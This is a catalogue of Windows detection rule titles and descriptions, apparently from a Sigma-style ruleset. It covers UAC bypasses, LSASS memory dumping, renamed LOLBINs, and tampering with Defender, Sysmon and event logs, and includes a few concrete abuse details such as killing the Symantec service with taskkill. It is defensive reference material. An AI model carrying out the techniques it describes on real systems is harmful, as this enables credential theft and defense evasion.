Enable LM Hash Storage - ProcCreationhighDetects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
RestrictedAdminMode Registry Value Tampering - ProcCreationhighDetects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
Potential Tampering With RDP Related Registry Keys Via Reg.EXEhighDetects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
Reg Add Suspicious PathshighDetects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
Disabled Volume SnapshotshighDetects commands that temporarily turn off Volume Snapshots
Suspicious Windows Defender Registry Key Tampering Via Reg.EXEhighDetects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
Write Protect For Storage DisabledmediumDetects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
Remote Access Tool - RURAT Execution From Unusual LocationmediumDetects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
Remote Access Tool - NetSupport Execution From Unusual LocationmediumDetects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files')
Renamed AutoHotkey.EXE ExecutionmediumDetects execution of a renamed autohotkey.exe binary based on PE metadata fields
Renamed AutoIt ExecutionhighDetects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.
Potential Defense Evasion Via Binary RenamemediumDetects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
Potential Defense Evasion Via Rename Of Highly Relevant BinarieshighDetects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
Renamed BOINC Client ExecutionmediumDetects the execution of a renamed BOINC binary.
Renamed CreateDump Utility ExecutionhighDetects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
Renamed CURL.EXE ExecutionmediumDetects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
Renamed ZOHO Dctask64 ExecutionhighDetects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
Renamed FTP.EXE ExecutionmediumDetects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
Renamed Jusched.EXE ExecutionhighDetects the execution of a renamed "jusched.exe" as seen used by the cobalt group
Renamed Mavinject.EXE ExecutionhighDetects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
Renamed MegaSync ExecutionhighDetects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
Renamed Msdt.EXE ExecutionhighDetects the execution of a renamed "Msdt.exe" binary
Renamed Microsoft Teams ExecutionmediumDetects the execution of a renamed Microsoft Teams binary.
Renamed NetSupport RAT ExecutionhighDetects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings
Renamed NirCmd.EXE ExecutionhighDetects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
Renamed Office Binary ExecutionhighDetects the execution of a renamed office binary
Renamed PAExec ExecutionhighDetects execution of renamed version of PAExec. Often used by attackers
Renamed PingCastle Binary ExecutionhighDetects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
Renamed Plink ExecutionhighDetects the execution of a renamed version of the Plink binary
Visual Studio NodejsTools PressAnyKey Renamed ExecutionmediumDetects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
Renamed Remote Utilities RAT (RURAT) ExecutionmediumDetects execution of renamed Remote Utilities (RURAT) via Product PE header field
Renamed ProcDump ExecutionhighDetects the execution of a renamed ProcDump executable. This often done by attackers or malware in order to evade defensive mechanisms.
Renamed Vmnat.exe ExecutionhighDetects renamed vmnat.exe or portable version that can be used for DLL side-loading
Potential Rundll32 Execution With DLL Stored In ADShighDetects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
Suspicious Advpack Call Via Rundll32.EXEhighDetects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
Suspicious Rundll32 Invoking Inline VBScripthighDetects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
Rundll32 InstallScreenSaver ExecutionmediumAn attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
Rundll32 Execution Without CommandLine ParametershighDetects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
Mshtml.DLL RunHTMLApplication Suspicious UsagehighDetects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
Potential Obfuscated Ordinal Call Via Rundll32mediumDetects execution of "rundll32" with potential obfuscated ordinal calls
Rundll32 Spawned Via Explorer.EXEmediumDetects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
Process Memory Dump Via Comsvcs.DLLhighDetects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
Suspicious Process Start LocationsmediumDetects suspicious process run from unusual locations
Suspicious Rundll32 Setupapi.dll Activitymediumsetupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
Shell32 DLL Execution in Suspicious DirectoryhighDetects shell32.dll executing a DLL in a suspicious directory
Potential ShellDispatch.DLL Functionality AbusemediumDetects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
RunDLL32 Spawning ExplorerhighDetects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
Potentially Suspicious Rundll32 ActivitymediumDetects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
Suspicious Control Panel DLL LoadhighDetects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
Suspicious Rundll32 Execution With Image ExtensionhighDetects the execution of Rundll32.exe with DLL files masquerading as image files
Suspicious Usage Of ShellExec_RunDLLhighDetects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
Suspicious ShellExec_RunDLL Call Via OrdinalhighDetects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
ShimCache FlushhighDetects actions that clear the local ShimCache and remove forensic evidence
Suspicious Rundll32 Activity Invoking Sys FilehighDetects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
Rundll32 Execution With Uncommon DLL ExtensionmediumDetects the execution of rundll32 with a command line that doesn't contain a common extension
Rundll32 UNC Path ExecutionhighDetects rundll32 execution where the DLL is located on a remote location (share)
Suspicious Workstation Locking via Rundll32mediumDetects a suspicious call to the user32.dll function that locks the user workstation
Run Once Task Execution as Configured in RegistrylowThis rule detects the execution of Run Once task as configured in the registry
Suspicious Scheduled Task Creation via Masqueraded XML FilemediumDetects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
Possible Privilege Escalation via Weak Service PermissionshighDetection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
Service StartupType Change Via Sc.EXEmediumDetect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
Service DACL Abuse To Hide Services Via Sc.EXEhighDetects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
Service Security Descriptor Tampering Via Sc.EXEmediumDetection of sc.exe utility adding a new service with special permission which hides that service.
Sdiagnhost Calling Suspicious Child ProcesshighDetects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
Potential Suspicious Activity Using SeCEditmediumDetects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
Uncommon Child Process Of Setres.EXEhighDetects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
Setup16.EXE Execution With Custom .Lst FilemediumDetects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. These ".lst" file can contain references to external program that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living of the land utility.
Uncommon Sigverif.EXE Child ProcessmediumDetects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
Suspicious Splwow64 Without ParamshighDetects suspicious Splwow64.exe process without any command line parameters
Arbitrary File Download Via Squirrel.EXEmediumDetects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Process Proxy Execution Via Squirrel.EXEmediumDetects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Program Executed Using Proxy/Local Command Via SSH.EXEmediumDetect usage of the "ssh.exe" binary as a proxy to launch other programs.
Execution via stordiag.exehighDetects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
Start of NT Virtual DOS MachinemediumNtvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
Execute From Alternate Data StreamsmediumDetects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
Potentially Suspicious Windows App ActivitymediumDetects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
Bad Opsec Defaults Sacrificial Processes With Improper ArgumentshighDetects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
Potential Commandline Obfuscation Using Escape CharactersmediumDetects potential commandline obfuscation using known escape characters
Potential CommandLine Obfuscation Using Unicode Characters From Suspicious ImagehighDetects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Potential Command Line Path Traversal Evasion AttemptmediumDetects potential evasion or obfuscation attempts using bogus path traversal via the commandline
Suspicious Copy From or To System DirectorymediumDetects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
LOL-Binary Copied From System DirectoryhighDetects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
Raccine UninstallhighDetects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
Suspicious Parent Double Extension File ExecutionhighDetect execution of suspicious double extension files in ParentCommandLine
DumpStack.log Defender EvasioncriticalDetects the use of the filename DumpStack.log to evade Microsoft Defender
Elevated System Shell Spawned From Uncommon Parent LocationmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2highDetects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1highDetects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3highDetects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
ETW Logging Tamper In .NET Processes Via CommandLinehighDetects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4highDetects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
ETW Trace Evasion ActivityhighDetects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
Suspicious Eventlog Clearing or Configuration Change ActivityhighDetects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique were seen used by threat actors and ransomware strains in order to evade defenses.
Potentially Suspicious Execution From Parent Process In Public FolderhighDetects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
Process Execution From A Potentially Suspicious FolderhighDetects a potentially suspicious execution from an uncommon folder.
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLImediumDetects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
Writing Of Malicious Files To The Fonts FoldermediumMonitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
Potential Homoglyph Attack Using Lookalike CharactersmediumDetects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
Execution Of Non-Existing FilehighChecks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
LOLBIN Execution From Abnormal DrivemediumDetects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.
Potential File Download Via MS-AppInstaller Protocol HandlermediumDetects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
Execution of Suspicious File Type ExtensionmediumDetects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.
Non-privileged Usage of Reg or PowershellhighSearch for usage of reg or Powershell by non-privileged users to modify service configuration in registry
Process Launched Without Image NamemediumDetect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
Potentially Suspicious Call To Win32_NTEventlogFile ClasshighDetects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
Use Short Name Path in Command LinemediumDetect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
Use Short Name Path in ImagemediumDetect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
Use NTFS Short Name in Command LinemediumDetect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
Use NTFS Short Name in ImagemediumDetect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
Suspicious Process ParentshighDetects suspicious parent processes that should not have any children or should only have a single possible child program
Potential PowerShell Execution Via DLLhighDetects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine.
Windows Processes Suspicious Parent DirectorylowDetect suspicious parent processes of well-known Windows processes
Suspicious Process Execution From Fake Recycle.Bin FolderhighDetects process execution from a fake recycle bin folder, often used to avoid security solution.
Potential Defense Evasion Via Right-to-Left OverridehighDetects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques.
Suspicious Service Binary DirectoryhighDetects a service binary running in a suspicious directory
Suspicious Windows Service TamperinghighDetects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
System File Execution Location AnomalyhighDetects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
Shadow Copies Deletion Using Operating Systems UtilitieshighShadow Copies deletion using operating systems utilities
Windows Shell/Scripting Processes Spawning Suspicious ProgramshighDetects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
Suspicious SYSTEM User Process CreationhighDetects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
Tasks Folder EvasionhighThe Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Process Creation Using Sysnative FoldermediumDetects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
Suspicious Userinit Child ProcessmediumDetects a suspicious child process of userinit
Malicious Windows Script Components File Execution by TAEF DetectionlowWindows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
Malicious PE Execution by Microsoft Visual Studio DebuggermediumThere is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.
Weak or Abused Passwords In CLImediumDetects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline
Execution via WorkFolders.exehighDetects using WorkFolders.exe to execute an arbitrary control.exe
Suspect Svchost ActivityhighIt is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
Suspicious Process Masquerading As SvcHost.EXEhighDetects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
Uncommon Svchost Parent ProcessmediumDetects an uncommon svchost parent process
Potential Memory Dumping Activity Via LiveKDmediumDetects execution of LiveKD based on PE metadata or image name
Kernel Memory Dump Via LiveKDhighDetects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
Procdump ExecutionmediumDetects usage of the SysInternals Procdump utility
Potential SysInternals ProcDump EvasionhighDetects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
Potential LSASS Process Dump Via ProcdumphighDetects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
Sysinternals PsSuspend Suspicious ExecutionhighDetects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
Sysmon Configuration UpdatemediumDetects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
Uninstall Sysinternals SysmonhighDetects the removal of Sysmon, which could be a potential attempt at defense evasion
Potential Binary Impersonating Sysinternals ToolsmediumDetects binaries that use the same name as legitimate sysinternals tools to evade detection
Potential Signing Bypass Via Windows Developer FeatureshighDetects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
Suspicious Recursive TakeownmediumAdversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
Taskkill Symantec Endpoint ProtectionhighDetects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
Taskmgr as LOCAL_SYSTEMhighDetects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
New Process Created Via Taskmgr.EXElowDetects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
Bypass UAC via CMSTPhighDetect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
UAC Bypass Using Disk CleanuphighDetects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
UAC Bypass Using ChangePK and SLUIhighDetects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
CMSTP UAC Bypass via COM Object AccesshighDetects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
UAC Bypass Tools Using ComputerDefaultshighDetects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
UAC Bypass Using Consent and Comctl32 - ProcesshighDetects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using DismHosthighDetects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
UAC Bypass Using Event Viewer RecentViewshighDetects the pattern of UAC Bypass using Event Viewer RecentViews
UAC Bypass Using NTFS Reparse Point - ProcesshighDetects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass via ICMLuaUtilhighDetects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
UAC Bypass Using IDiagnostic ProfilehighDetects the "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - ProcesshighDetects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
UAC Bypass Using MSConfig Token Modification - ProcesshighDetects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using PkgMgr and DISMhighDetects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
Potential UAC Bypass Via Sdclt.EXEmediumA General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
TrustedPath UAC Bypass PatterncriticalDetects indicators of a UAC bypass method by mocking directories
UAC Bypass Abusing Winsat Path Parsing - ProcesshighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - ProcesshighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Bypass UAC via WSReset.exehighDetects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
UAC Bypass WSResethighDetects the pattern of UAC Bypass via WSReset usable by default sysmon-config
Uninstall Crowdstrike Falcon SensorhighAdversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
Verclsid.exe Runs COM ObjectmediumDetects when verclsid.exe is used to run COM object via GUID
Detect Virtualbox Driver Installation OR Starting Of VMslowAdversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
Suspicious VBoxDrvInst.exe ParametersmediumDetect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
Potentially Suspicious Child Process Of VsCodemediumDetects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
Potential Binary Proxy Execution Via VSDiagnostics.EXEmediumDetects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
Suspicious Vsls-Agent Command With AgentExtensionPath LoadmediumDetects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
Wab Execution From Non Default LocationhighDetects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
Wab/Wabmig Unusual Parent Or Child ProcesseshighDetects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
Potential ReflectDebugger Content Execution Via WerFault.EXEmediumDetects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
Suspicious Child Process Of Wermgr.EXEhighDetects suspicious Windows Error Reporting manager (wermgr.exe) child process
Add New Download Source To WingetmediumDetects usage of winget to add new additional download sources
Add Insecure Download Source To WingethighDetects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
Add Potential Suspicious New Download Source To WingetmediumDetects usage of winget to add new potentially suspicious download sources
Install New Package Via Winget Local ManifestmediumDetects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xslmediumDetects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
Remote Code Execute via Winrm.vbsmediumDetects an attempt to execute code or create service on remote host via winrm.vbs.
Wlrmdr.EXE Uncommon Argument Or Child ProcessmediumDetects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
Potential SquiblyTwo Technique ExecutionmediumDetects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
Suspicious WMIC Execution Via Office ProcesshighOffice application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
Potential Tampering With Security Products Via WMIChighDetects uninstallation or termination of security products using the WMIC utility
XSL Script Execution Via WMIC.EXEmediumDetects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
Suspicious WmiPrvSE Child ProcesshighDetects suspicious and uncommon child processes of WmiPrvSE
UEFI Persistence Via Wpbbin - ProcessCreationhighDetects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
WSL Child Process AnomalymediumDetects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
Windows Binary Executed From WSLmediumDetects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships
Proxy Execution Via Wuauclt.EXEhighDetects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
Suspicious Windows Update Agent Empty CmdlinehighDetects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
Xwizard.EXE Execution From Non-Default LocationhighDetects the execution of Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
COM Object Execution via Xwizard.EXEmediumDetects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. This utility can be abused in order to run custom COM object created in the registry.
Potential Process Hollowing ActivitymediumDetects when a memory process image does not match the disk image, indicative of process hollowing.
Potential Defense Evasion Via Raw Disk Access By Uncommon ToolslowDetects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts
Potential NetWire RAT Activity - RegistryhighDetects registry keys related to NetWire RAT
Folder Removed From Exploit Guard ProtectedFolders List - RegistryhighDetects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
Terminal Server Client Connection History Cleared - RegistryhighDetects the deletion of registry keys containing the MSTSC connection history
Removal Of AMSI Provider Registry KeyshighDetects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
Removal of Potential COM Hijacking Registry KeysmediumDetects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
Removal Of Index Value to Hide Schedule Task - RegistrymediumDetects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
Removal Of SD Value to Hide Schedule Task - RegistrymediumRemove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
UAC Bypass Via WsresethighUnfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
CMSTP Execution Registry EventhighDetects various indicators of Microsoft Connection Manager Profile Installer execution
Disable Security Events Logging Adding Reg Key MiniNthighDetects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.
Wdigest CredGuard Registry ModificationhighDetects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.
Potential Qakbot Registry ActivityhighDetects a registry key used by IceID in a campaign that distributes malicious OneNote files
NetNTLM Downgrade Attack - RegistryhighDetects NetNTLM downgrade attack
New PortProxy Registry Entry AddedmediumDetects the modification of the PortProxy registry key which is used for port forwarding.
RedMimicry Winnti Playbook Registry ManipulationhighDetects actions caused by the RedMimicry Winnti playbook
Run Once Task Configuration in RegistrymediumRule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
Shell Open Registry Keys ManipulationhighDetects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
Atbroker Registry ChangemediumDetects creation/modification of Assistive Technology applications and persistence with usage of 'at'
Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallbackmediumDetects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
Registry Persistence via Service in Safe ModehighDetects the modification of the registry to allow a driver or service to persist in Safe Mode.
